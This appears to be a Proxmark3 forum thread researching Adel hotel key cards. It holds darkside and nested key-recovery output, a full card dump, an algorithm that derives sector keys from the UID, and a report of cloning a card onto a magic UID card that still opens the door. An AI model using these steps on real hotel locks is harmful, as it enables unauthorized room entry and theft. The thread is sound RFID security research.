Proxmark3 community
Research, development and trades concerning the powerful Proxmark3 device.
Remember; sharing is caring. Bring something back to the community.
"Learn the tools of the trade the hard way." +Fravia
You are not logged in.
Announcement
Time changes and with it the technology
Proxmark3 @ discord
Users of this forum, please be aware that information stored on this site is not private.
Pages: 1
#1 2017-12-08 11:38:02
- iceman
- Administrator
- Registered: 2013-04-25
- Posts: 9,537
- Website
Hotel system Adel - dump
The Adel card is a clone which always nacks. Making darkside take a bit longer. Not needed since its a default key, which would be picked up with checkkeys.
Uses a very strange SAK, 0x19
Many default keys, the sector 1, 15 AB == 127567df7ba4 --> 12 UID A4
pm3 --> hf 14a info
UID : 75 67 DF 7B
ATQA : 00 04
SAK : 19 [2]
proprietary non iso14443-4 card found, RATS not supported
Answers to magic commands: NO
Prng detection: WEAK
pm3 --> hf mf nack
.
Always leak NACK detected pm3 --> hf mf mif
----------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average
Press pm3-button on the proxmark3 device to abort both proxmark3 and client.
----------------------------------------------------------------------------
.
Parity is all zero. Most likely this card sends NACK on every authentication.
Attack will take a few seconds longer because we need two consecutive successful runs.
.....
Found 72 candidate keys. Trying to verify with authentication...
Test authentication failed. Restarting darkside attack
.
Parity is all zero. Most likely this card sends NACK on every authentication.
Attack will take a few seconds longer because we need two consecutive successful runs.
..
Found 13 candidate keys. Trying to verify with authentication...
Test authentication failed. Restarting darkside attack
.
Parity is all zero. Most likely this card sends NACK on every authentication.
Attack will take a few seconds longer because we need two consecutive successful runs.
..
Found a candidate key. Trying to verify it with authentication...
Found valid key: a0a1a2a3a4a5pm3 --> hf mf nested 1 0 a a0a1a2a3a4a5
Testing known keys. Sector count=16
Time to check 18 known keys: 7 seconds
enter nested...
UID: 7567df7b target block: 0 key type: B -- Found key [d0d1d2d3d4d5]
UID: 7567df7b target block: 4 key type: A -- Found key [127567df7ba4]
UID: 7567df7b target block: 4 key type: B
UID: 7567df7b target block: 60 key type: A -- Found key [127567df7ba4]
UID: 7567df7b target block: 60 key type: B -- Found key [127567df7ba4]
UID: 7567df7b target block: 4 key type: B -- Found key [127567df7ba4]
Time in nested: 12 seconds
trying to read key B...
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| a0a1a2a3a4a5 | 1 | d0d1d2d3d4d5 | 1 |
|001| 127567df7ba4 | 1 | 127567df7ba4 | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| ffffffffffff | 1 | ffffffffffff | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| ffffffffffff | 1 | ffffffffffff | 1 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| ffffffffffff | 1 | ffffffffffff | 1 |
|011| ffffffffffff | 1 | ffffffffffff | 1 |
|012| ffffffffffff | 1 | ffffffffffff | 1 |
|013| ffffffffffff | 1 | ffffffffffff | 1 |
|014| ffffffffffff | 1 | ffffffffffff | 1 |
|015| 127567df7ba4 | 1 | 127567df7ba4 | 1 |
|---|----------------|---|----------------|---| Offline
#2 2017-12-08 11:42:57
- iceman
- Administrator
- Registered: 2013-04-25
- Posts: 9,537
- Website
Re: Hotel system Adel - dump
7567df7bb619040069444c4b56328ba0
00006c510000000000000000000000aa
00000000000000000000000000006851
a0a1a2a3a4a5787788c1d0d1d2d3d4d5
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
127567df7ba408778fff127567df7ba4
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
ffffffffffffff078069ffffffffffff
100193415669898505557d9688594896
8888888888888885dddddddddd9d0000
00000000000000000000000000000000
127567df7ba408778fff127567df7ba4Offline
#3 2017-12-08 12:43:53
- iceman
- Administrator
- Registered: 2013-04-25
- Posts: 9,537
- Website
Re: Hotel system Adel - dump
simple keygen algo:
key[0] = uid[0] ^ uid[1]
key[1-4] = uid[0-3]
key[5] = checksum ( key[0]^key[1]^key[2]^key[3]^key[4] )Offline
#4 2018-07-19 15:49:04
- henc
- Contributor
- Registered: 2017-05-13
- Posts: 11
Re: Hotel system Adel - dump
Hey Iceman did these have sector 16 - 31 locked down as well? Think I have a couple samples from the same system as you, the XOR algo on mine matches yours. I have one sample that's been coded in the system with a biometrics application and one that should be straight out of the box from the supplier without additional coding from the hotel's desktop encoder. Both have S16 - 31 A/B locked and I don't think those sectors follow the S1/15 keys you cracked.
SAK 0x19 seemed strange to me as well (it's how I stumbled on this thread) - assumed this chip was Mifare Plus 2k 4 byte UID in SL1 but I expected SAK to be 0x18 then.
Offline
#5 2018-07-19 20:40:02
- iceman
- Administrator
- Registered: 2013-04-25
- Posts: 9,537
- Website
Re: Hotel system Adel - dump
Dunno if s16-31 matches. I didn't have access to a 4k card from Adel. Collect and gather enough samples so you can do some analysing done.
Offline
#6 2019-07-19 21:02:19
- hfmfsniff
- Contributor
- Registered: 2019-07-07
- Posts: 19
Re: Hotel system Adel - dump
Dunno if s16-31 matches. I didn't have access to a 4k card from Adel. Collect and gather enough samples so you can do some analysing done.
I successfully cloned a ADEL card to a UID (Chinese magic gen1, 1k) card.
ADEL card just used a strange SAK=19 to confuse regular hobbyist. It is just a regular M1 S50 1k with SAK altered. There are not locked sector 16 - 31. And it doesn't require anything but sector 1 and 15 to open the door like most door access system does. (at least in my version)
To clone it, I managed to sourced a "perfect" UID card that loyally read SAK bytes in block 0 and response to reader with that SAK.
This card is quite rare since most UID/magic cards just respond SAK 08 for simplicity I guess? Just found 4 out of 60 cards....
(was 4 out of 33, and I thought as my vendor search expands there will be more "perfect" cards emerging, but it doesn't turn out that way.)
Last edited by hfmfsniff (2019-07-19 21:06:36)
Offline
#7 2019-07-19 21:16:53
- hfmfsniff
- Contributor
- Registered: 2019-07-07
- Posts: 19
Re: Hotel system Adel - dump
sector 0: blk1: 0000 6c51 0000 0000 0000 0000 0000 00aa blk2: 0000 0000 0000 0000 0000 0000 0000 6851 ....
Sector 0 of ADEL card is usually filled with (often with consecutive repetition) 6C51, 6B51, 6851, 6A51. Does that make any sense to you?
here is my sample.
blk1: 0007 6C51 0000 0000 0000 0000 0000 0600
blk2: 6B51 6B51 6B51 6B51 6B51 6B51 6851 6A51This pattern is highly conservative across 3 cards that opens the same door. What is funny is that only the last "6A51" in blk2 is useful. It can be modified to the following but still can open the door
blk1: 0007 6C51 0000 0000 0000 0000 0000 0600
blk2: 0000 0000 0000 0000 0000 0000 0000 6A51This pattern aligns with your pattern very well
Last edited by hfmfsniff (2019-07-19 21:20:12)
Offline
#8 2019-07-20 10:06:43
- piwi
- Contributor
- Registered: 2013-06-04
- Posts: 704
Re: Hotel system Adel - dump
Sector 0 blocks 1 and 2 most often contain the Mifare Application Directory (MAD). It shows which sectors are used by which application. You can lookup the application IDs on http://cardinfo.barkweb.com.au/index.ph … =19&sub=36. The MAD checksum will become invalid if you modify parts of it.
Offline
#9 2019-08-04 03:57:55
- hfmfsniff
- Contributor
- Registered: 2019-07-07
- Posts: 19
Re: Hotel system Adel - dump
Sector 0 blocks 1 and 2 most often contain the Mifare Application Directory (MAD). It shows which sectors are used by which application. You can look up the application IDs on http://cardinfo.barkweb.com.au/index.ph … =19&sub=36. The MAD checksum will become invalid if you modify parts of it.
Very useful information. However, I think ADEL doesn't check CRC bits validity (block1, second byte) at all. The cards still open the door after modification of AIDs.
Offline
Pages: 1